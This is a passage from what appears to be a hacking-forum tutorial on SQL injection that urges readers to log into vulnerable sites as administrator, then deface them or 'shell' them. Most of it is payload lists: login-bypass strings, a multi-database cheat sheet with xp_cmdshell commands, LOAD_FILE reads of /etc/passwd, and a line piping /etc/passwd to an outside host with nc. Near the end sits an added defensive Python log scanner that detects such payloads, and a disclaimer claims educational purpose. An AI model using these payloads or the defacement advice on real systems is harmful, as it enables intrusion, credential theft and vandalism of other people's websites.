  • admin'/*

  • or 1=1--

  • or 1=1#

  • or 1=1/*

  • ) or '1'='1--

  • ) or ('1'='1--





 


Note: Sometimes this is not the best way of hacking websites with SQL injection, but I guarantee that if you're patient you'll become a successful SQL injector and get used to this method.


 

Step 3: I LOGGED in, what do I do now?!
Well, first off, if you did log in, then congrats on your first successful attempt at SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it.
Others will just shell it and put it to other uses such as rooting, web hosting etc.
If you would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon. Now you might want to watch the video so that you'll get the idea of how I log in as an administrator on a SQLi-vulnerable website.


 


 

Extras:
Common Password Queries:

Code:

  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--



If the database version is 5 or above, then queries using UNION, GROUP BY, @@version, ORDER BY, BENCHMARK etc. can be executed. Note that the list below mixes the syntax of several database engines (MSSQL, MySQL, DB2, PostgreSQL and Ingres), so each query only works against the engine whose dialect it uses.


Code:

  • 1234' AND 1=0 UNION ALL SELECT 'admin'
  • ' HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1 HAVING 1=1 --
  • @@version
  • select @@version
  • select @@servername
  • select @@microsoftversion
  • select * from master..sysservers
  • select * from sysusers
  • exec master..xp_cmdshell 'ipconfig+/all'
  • exec master..xp_cmdshell 'net+view'
  • exec master..xp_cmdshell 'net+users'
  • SELECT 1 -- comment
  • SELECT /*comment*/1
  • ORDER BY 1--
  • ' union all select sum(columntofind) from users--
  • UNION ALL SELECT null
  • SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
  • SELECT TOP n columns
  • select * from OPENROWSET('MSDASQL'
  • select * from OPENROWSET('SQLOLEDB'
  • masters..sysxlogins
  • sys.sql_logins
  • SELECT/*avoid-spaces*/password/**/FROM/**/Members
  • SELECT CHAR(0x66)
  • SELECT * FROM members
  • @@version
  • SELECT USER();
  • select host
  • SELECT 1;
  • SELECT /*comment*/1;
  • ORDER BY 1--
  • UNION ALL SELECT null
  • SELECT schema_name FROM information_schema.schemata;
  • SELECT table_schema
  • SELECT grantee
  • limit 1
  • SELECT host
  • IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
  • select benchmark( 500
  • SELECT CHAR(75)+CHAR(76)+CHAR(77)
  • SELECT ascii('A')
  • SELECT CONCAT('0x'
  • SELECT/*avoid-spaces*/password/**/FROM/**/Members
  • SELECT /*!32302 1/0
  • SELECT 0x5045
  • SELECT cast('1' AS unsigned integer);
  • SELECT cast('123' AS char);
  • SELECT IF(1=1
  • ' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
  • union SELECT LOAD_FILE(0x2f6574632f706173737764)
  • load data infile 'c:/boot.ini' into table foo;
  • # SELECT ... INTO DUMPFILE
  • SELECT login || '-' || password FROM members
  • select versionnumber
  • select user from sysibm.sysdummy1;
  • select session_user from sysibm.sysdummy1;
  • select system_user from sysibm.sysdummy1;
  • select * from syscat.tabauth;
  • select current server from sysibm.sysdummy1;
  • select * from syscat.dbauth where grantee = current user;
  • select * from syscat.tdbauth where grantee = current user;
  • select name from sysibm.systables;
  • select name
  • SELECT schemaname FROM syscat.schemata;
  • SELECT foo FROM bar fetch first 1 rows only;
  • select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
  • select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
  • SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1;
  • SELECT cast('123' as integer) FROM sysibm.sysdummy1;
  • select version();
  • select current_database();
  • select current_user;
  • select session_user;
  • SELECT current_setting('data_directory');
  • select current_setting('log_connections');
  • select current_setting('log_statement');
  • select current_setting('port');
  • select current_setting('password_encryption');
  • select current_setting('krb_server_keyfile');
  • select current_setting('virtual_host');
  • select current_setting('port');
  • select current_setting('config_file');
  • select current_setting('hba_file');
  • select current_setting('data_directory');
  • LIMIT n
  • SELECT pg_sleep(10);
  • SELECT current_database()
  • SELECT relname
  • SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
  • SELECT DISTINCT relname FROM pg_class C
  • SELECT 1; --comment
  • SELECT /*comment*/1;
  • SELECT chr(65);
  • SELECT ascii('A');
  • SELECT CHR(65)||CHR(66);
  • SELECT usename
  • SELECT usename FROM pg_user WHERE usesuper IS TRUE
  • SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
  • SELECT 'A' || 'B';
  • SELECT CAST(1 as varchar);
  • SELECT CAST('1' as int);
  • SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
  • select dbmsinfo('_version');
  • select dbmsinfo('session_user');
  • select dbmsinfo('system_user');
  • select dbmsinfo('database');
  • select dbmsinfo('db_admin');
  • select dbmsinfo('create_table');
  • select dbmsinfo('create_procedure');
  • select dbmsinfo('security_priv');
  • select dbmsinfo('select_syscat');
  • select dbmsinfo('db_privileges');
  • select dbmsinfo('current_priv_mask');
  • select top 10 blah from table;
  • select first 10 blah form table;
  • select table_name
  • select relid
  • select relid
  • select column_name
  • select 1 union select 2;
  • select cast('123' as integer);
  • select @@version
  • select name from master..syslogins
  • select name from master..sysdatabases
  • convert(integer
  • waitfor delay '0:0:5'



Database versions lower than 5 (i.e. version 4) do not accept the UNION-style queries written for version 5.


 

I tried injecting many of them and it worked, so it should work for you too.
Good luck
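A defender's counterpart to the payload lists above, added here as an illustration and not part of the original post: a small detector that scans login-attempt log lines for the three shapes the listed payloads share (a quote followed by OR/AND, an OR/AND joining a trivially true comparison such as 1=1, and a field that ends in a SQL comment opener). The log format, the field delimiters and the sample lines are constructed for the example; a real deployment would read them from the web server or application log.

```python
import re

# Shapes shared by the bypass payloads listed in the post:
#  1. a quote (optionally followed by a closing paren) immediately followed by OR / AND
#  2. OR / AND joining a trivially true comparison such as 1=1 or 'x'='x
#  3. a field ending in a comment opener (--, # or /*) that discards the rest of the query
SQLI_PATTERNS = [
    re.compile(r"""['"]\s*\)?\s*(or|and)\b""", re.IGNORECASE),
    re.compile(r"""\b(or|and)\s+['"]?\w+['"]?\s*=\s*['"]?\w+""", re.IGNORECASE),
    re.compile(r"""(--|#|/\*)\s*$"""),
]

# Constructed log format (not from any real server): one POST to the login page per line,
# with the submitted field values wrapped in angle brackets.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) POST (?P<path>\S+) user=<(?P<user>[^>]*)> pass=<(?P<pw>[^>]*)> status=(?P<status>\d+)"
)

# Constructed sample lines: one normal login, three of the post's payloads, one benign password
# that happens to contain 'or' and '#'.
LOG_LINES = [
    "2014-08-29T10:00:01Z POST /login.php user=<admin> pass=<correct-horse-battery> status=302",
    "2014-08-29T10:00:07Z POST /login.php user=<admin> pass=<' or 0=0 --> status=302",
    "2014-08-29T10:00:09Z POST /login.php user=<admin' #> pass=<x> status=302",
    "2014-08-29T10:00:15Z POST /login.php user=<bob> pass=<horse-or-cart#1> status=401",
    "2014-08-29T10:00:21Z POST /login.php user=<') or ('a'='a> pass=<anything> status=200",
]


def looks_like_sqli(value: str) -> bool:
    """True if the submitted field value matches one of the injection shapes."""
    return any(p.search(value) for p in SQLI_PATTERNS)


def scan_login_log(lines):
    """Return (timestamp, field, value, status) for every login field that matches.

    The HTTP status is carried along because a redirect or 200 after a matching
    payload is the case that needs immediate attention: the bypass may have worked.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("user", "pw"):
            if looks_like_sqli(m.group(field)):
                hits.append((m.group("ts"), field, m.group(field), m.group("status")))
    return hits


if __name__ == "__main__":
    for ts, field, value, status in scan_login_log(LOG_LINES):
        print(f"{ts} {field}={value!r} status={status}")
```

The patterns are deliberately narrow (a quote or comment marker in the right position, not merely the word "or"), which is why the password `horse-or-cart#1` is not flagged while every payload shape from the lists is. Any match on a request that produced a redirect or 200 is worth correlating with the application's database error log, since a successful bypass usually leaves no error at all.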


 


 

Note:

All information on this forum is for educational purposes only.
We are not responsible for any attacks that are carried out on networks, websites or servers.




 